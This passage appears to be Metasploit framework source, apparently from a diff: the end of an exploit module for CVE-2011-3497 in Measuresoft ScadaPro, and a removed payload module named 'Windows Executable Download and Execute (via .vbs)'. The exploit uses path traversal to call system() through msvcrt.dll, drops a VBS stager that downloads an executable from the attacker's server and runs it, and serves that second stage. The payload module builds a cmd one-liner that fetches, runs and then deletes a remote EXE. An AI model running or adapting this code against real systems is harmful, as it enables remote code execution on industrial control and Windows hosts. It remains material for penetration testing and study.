vulnerability affects version 4.0.0 and earlier.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Luigi Auriemma', # Initial discovery/poc
'mr_me <steventhomasseeley[at]gmail.com>', # msf
'TecR0c <tecr0c[at]tecninja.net>', # msf
],
'References' =>
[
[ 'CVE', '2011-3497'],
[ 'OSVDB', '75490'],
[ 'BID', '49613'],
[ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'],
[ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'],
# seemed pretty accurate to us ;)
[ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'],
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
},
'Platform' => 'win',
'Targets' =>
[
# truly universal
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 16 2011'))
register_options(
[
Opt::RPORT(11234),
OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
])
end
# couldn't generate a vbs or exe payload and then use the wF command
# as there is a limit to the amount of data to write to disk.
# so we just write out a vbs script like the old days.
def build_vbs(url, stager_name)
name_xmlhttp = rand_text_alpha(2)
name_adodb = rand_text_alpha(2)
tmp = "#{@temp_folder}/#{stager_name}"
vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"
vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 "
vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}"
return vbs
end
def on_request_uri(cli, request)
if request.uri =~ /\.exe/
print_status("Sending 2nd stage payload")
return if ((p=regenerate_payload(cli)) == nil)
data = generate_payload_exe( {:code=>p.encoded} )
send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
return
end
end
def exploit
# In order to save binary data to the file system the payload is written to a .vbs
# file and execute it from there.
@payload_name = rand_text_alpha(4)
@temp_folder = "C:/Windows/Temp"
if datastore['SRVHOST'] == '0.0.0.0'
lhost = Rex::Socket.source_address('50.50.50.50')
else
lhost = datastore['SRVHOST']
end
payload_src = lhost
payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
stager_name = rand_text_alpha(6) + ".vbs"
stager = build_vbs(payload_src, stager_name)
path = "..\\..\\..\\..\\..\\windows\\system32"
createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n"
download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n"
print_status("Sending 1st stage payload...")
connect
sock.get_once()
sock.put(createvbs)
sock.get_once()
sock.put(download_execute)
handler()
disconnect
super
end
end


@ -1,72 +0,0 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module MetasploitModule
CachedSize = :dynamic
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Windows Executable Download and Execute (via .vbs)',
'Description' => 'Download an EXE from an HTTP(S) URL and execute it',
'Author' => 'scriptjunkie',
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::None,
'Session' => Msf::Sessions::CommandShell,
'PayloadType' => 'cmd',
'RequiredCmd' => 'wscript',
'Payload' =>
{
'Offsets' => { },
'Payload' => ''
}
))
register_options(
[
OptString.new('URL', [ true, "The pre-encoded URL to the executable" ]),
OptString.new('EXT', [ true, "The extension to give the saved file", "exe" ]),
OptBool.new('INCLUDECMD', [ true, "Include the cmd /q /c", false ]),
OptBool.new('DELETE', [ true, "Delete created .vbs after download", true ])
])
end
def generate
return super + command_string
end
def command_string
# It's already long. Keep variable names short.
vbsname = Rex::Text.rand_text_alpha(1+rand(2))
exename = Rex::Text.rand_text_alpha(1+rand(2))
xmlhttpvar = Rex::Text.rand_text_alpha(1+rand(2))
streamvar = Rex::Text.rand_text_alpha(1+rand(2))
command = ''
command << "cmd.exe /q /c " if datastore['INCLUDECMD']
# "start #{vbsname}.vbs" instead of just "#{vbsname}.vbs" so that the console window
# disappears quickly before the wscript libraries load and the file downloads
command << "cd %tmp%&echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\"):"+
"#{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False:"+
"#{xmlhttpvar}.Send:"+
"Set #{streamvar}=CreateObject(\"ADODB.Stream\"):"+
"#{streamvar}.Type=1:"+
"#{streamvar}.Open:"+
"#{streamvar}.Write #{xmlhttpvar}.responseBody:"+
"#{streamvar}.SaveToFile \"#{exename}.#{datastore['EXT']}\",2:"+
"CreateObject(\"WScript.Shell\").Run \"#{exename}.#{datastore['EXT']}\":"
command << "CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\"" if datastore['DELETE']
command << " >#{vbsname}.vbs"+
"&start wscript #{vbsname}.vbs"
end
end